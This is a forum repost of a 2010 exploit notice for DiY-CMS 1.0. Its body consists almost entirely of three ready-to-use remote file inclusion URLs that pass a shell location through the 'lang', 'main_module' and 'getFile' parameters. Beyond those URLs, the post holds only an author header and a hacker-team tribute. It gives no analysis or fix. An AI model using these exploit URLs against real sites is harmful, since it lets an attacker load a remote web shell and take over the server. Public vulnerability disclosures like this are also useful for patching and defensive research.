首页
社区
课程
招聘
[转帖]DiY-CMS 1.0 Multiple Remote File Inclusion Vulnerabilities
发表于: 2010-8-29 14:25 2423

[转帖]DiY-CMS 1.0 Multiple Remote File Inclusion Vulnerabilities

2010-8-29 14:25
2423
# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]   

# Date: [28-8-2010]   

# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN  

# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]   

# Version: [v 1.0 ]   

# Tested on: [Windows XP]   

# CVE : Hacker town of Musayyib  

#Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

   

Exploit: http://target/diycms_v1.0/diycms_v1.0/modules/guestbook/blocks/control.block.php?lang=[SHeLL]  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

~Exploit: http://target/diycms_v1.0/diycms_v1.0/index.php?main_module=[ShEll]  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

~Exploit: http://target/diycms_v1.0/diycms_v1.0/includes/general.functions.php?getFile=[SHELL]  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

   

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers  

           

        function toggle(obj) {  

            var el = document.getElementById(obj);  

            el.style.display = (el.style.display != 'none' ? 'none' : 'block' );  

        }

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//